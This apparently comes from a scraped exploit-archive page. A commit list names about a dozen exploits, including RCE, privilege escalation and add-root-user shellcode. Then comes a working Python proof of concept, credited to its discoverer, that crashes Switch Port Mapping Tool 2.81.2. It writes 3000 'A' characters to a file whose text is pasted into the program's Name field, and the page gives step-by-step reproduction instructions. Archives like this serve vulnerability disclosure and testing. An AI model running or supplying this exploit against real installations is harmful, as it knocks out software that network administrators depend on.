1e34c2b6a5
11 changes to exploits/shellcodes IP Finder 1.5 - Denial of Service (PoC) Acunetix WVS 10.0 Build 20150623 - Denial of Service (PoC) PLC Wireless Router GPN2.4P21-C-CN - Denial of Service Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service (PoC) Monitoring software iSmartViewPro 1.5 - 'SavePath for ScreenShots' Buffer Overflow PostgreSQL 9.4-0.5.3 - Privilege Escalation Android - Directory Traversal over USB via Injection in blkid Output Microsoft DirectX SDK - 'Xact.exe' Remote Code Execution Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit) Monstra-Dev 3.0.4 - Cross-Site Request Forgery(Account Hijacking) Monstra-Dev 3.0.4 - Cross-Site Request Forgery (Account Hijacking) IBM Sterling B2B Integrator 5.2.0.1/5.2.6.3 - Cross-Site Scripting Linux/x64 - Add Root User (toor/toor) Shellcode (99 bytes)
23 lines
No EOL
880 B
Python
Executable file
23 lines
No EOL
880 B
Python
Executable file
# Exploit Title: Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service (PoC)
|
|
# Discovery by: Shubham Singh
|
|
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
|
|
# Discovey Date: 2018-08-13
|
|
# Vendor Homepage: https://switchportmapper.com/
|
|
# Software Link: https://switchportmapper.com/download/spm2812.zip
|
|
# Tested Version: 2.81.2
|
|
# Tested on OS: Windows 7 Ultimate x86_64
|
|
# Steps to Reproduce:
|
|
# Run the python exploit script, it will create a new file with the name
|
|
# "exploit.txt". Just copy the text inside "exploit.txt" and start the
|
|
# Managed Switch Port Mapping Tool 2.81.2 program and click on "Enter Key".
|
|
# In the 'Name field' paste the content of "exploit.txt" and click
|
|
# on "OK". You will see a crash.
|
|
|
|
#!/usr/bin/env python
|
|
|
|
file = open("exploit.txt","wb")
|
|
junk = "A" * 3000
|
|
exploit = junk
|
|
buf = exploit
|
|
file.write(buf)
|
|
file.close() |